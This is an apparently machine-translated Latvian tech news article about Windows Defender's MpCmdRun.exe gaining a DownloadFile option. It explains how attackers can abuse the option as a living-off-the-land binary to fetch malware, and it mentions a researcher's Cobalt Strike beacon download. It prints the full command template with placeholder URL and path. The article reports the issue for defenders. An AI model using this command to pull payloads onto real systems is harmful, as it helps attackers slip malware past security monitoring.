- Windows Aizstāvis iekšā Windows 10 ir lielisks rīks sistēmas aizsardzībai, taču jauns atjauninājums to pārvērta par draudu.
- Jauns DownloadFile komandu var izmantot, lai lejupielādētu jebkuru ārēju failu, ieskaitot ļaunprātīgu programmatūru datorā.
- Izpētiet mūsu Programmatūras sadaļa labākos rakstus par jaunākajiem digitālajiem rīkiem.
- Ja jūs interesē jaunākie Windows 10 raksti, apmeklējiet mūsu visaptverošo Windows 10 centrmezgls.
Windows Defender operētājsistēmā Windows 10 ir pirmā aizsardzības līnija ļaunprātīgas programmatūras uzbrukumu gadījumā, un tā a diezgan labs darbs arī.
Tomēr vienā no jaunajiem atjauninājumiem varenais antivīruss ieguva jaunu komandu DownloadFile, kas ļaus ikvienam lejupielādēt jebkuru failu no URL uz noteiktu ceļu jūsu datorā.
Mēs to varam nosaukt par ekspluatāciju, jo to var izmantot arī ļaunprātīgas programmatūras lejupielādei, ko atklāja drošības pētnieks Mohammad Askar, kurš izlikts viņa atradums čivināt.
Kā Windows Defender var izmantot, lai lejupielādētu ļaunprātīgu programmatūru?
Ir ļoti vienkārši izmantot Microsoft antimalware servisa komandrindas utilītu (MpCmdRun.exe), lai lejupielādētu jebkuru failu no ārēja avota datorā.
MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]
Savā mēģinājumā Askars varēja lejupielādēt Cobalt Strike bāku, labi pazīstamu uzbrucēju rīku, izmantojot šo komandrindu.
Jaunā komanda ir iekļauta versijā 4.18.2007.8-0 un jaunākas versijas, kas dod diezgan labu sākuma laiku uzbrucējiem.
Būtībā šī funkcija pagriežas Windows Defender LOLBIN (dzīvo ārpus līnijas bināriem), nekaitīgs sistēmas fails, kuru var izmantot ļaunprātīgiem mērķiem.
Par laimi, pēc kaitīgā faila lejupielādes to atradīs tas pats Windows Defender vai cits pretvīrusu programmatūra ja ir klāt.
No uzticamas aizsardzības programmatūras Windows Defender pārvērtās par vēl vienu iespējamu draudu, kas būs cieši jāuzrauga administratoriem un drošības ekspertiem.
Ja jums ir kādi ieteikumi vai komentāri, lūdzu, atstājiet tos zemāk sadaļā Komentāri.
